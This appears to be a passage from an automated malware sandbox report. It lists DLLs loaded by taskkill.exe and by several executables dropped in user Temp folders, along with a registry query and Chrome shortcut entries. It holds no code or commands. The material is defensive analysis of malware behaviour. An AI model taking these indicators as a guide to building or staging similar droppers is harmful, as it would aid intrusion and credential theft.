Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Google Drive.lnk.18.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.18.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.18.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.18.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.18.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.18.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
